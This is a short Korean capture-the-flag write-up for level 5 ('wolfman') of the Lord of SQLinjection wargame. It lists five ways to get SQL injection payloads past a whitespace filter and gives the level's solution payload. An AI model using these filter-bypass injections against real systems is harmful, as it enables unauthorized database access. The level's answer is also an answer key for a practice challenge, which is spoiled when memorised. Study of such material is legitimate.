Lord of Sqlinjection - 5번 WOLFMAN

Lord of Sqlinjection - 5번 문제 WOLFMAN

5번 문제는 공백을 필터링하는 정규표현식이 추가되었습니다.

 

if(preg_match('\ \i', $_GET[pw])) exit("No whitespace ~_~");

 

공백 필터링 정규표현식을 우회하여 Sql 구문을 완성시켜야합니다.

 

 

SQL Injection 공격시 공백 문자 필터링 우회 방법

1. Tab : %09
  - ?pw='%09or%09id='admin'

2. Line Feed (\n): %0a
  - ?pw='%0aor%0aid='admin'

3. Carrage Return(\r) : %0d
  - ?pw='%0dor%0did='admin'

4. 주석 : /**/
  - ?pw='/**/or/**/id='admin' 

5. 괄호 : ()
  - ?pw=(')or(id='admin')

 

 

위 5가지 방법을 이용하여 테스트 시 아래와 같이 "Hello guest" 문구를 출력할 수 있습니다.

 

 

 

*** 정답 ***

where 절을 True 만들어 id 값 admin을 출력합니다

ex) ?pw='/**/or/**/id='admin'%23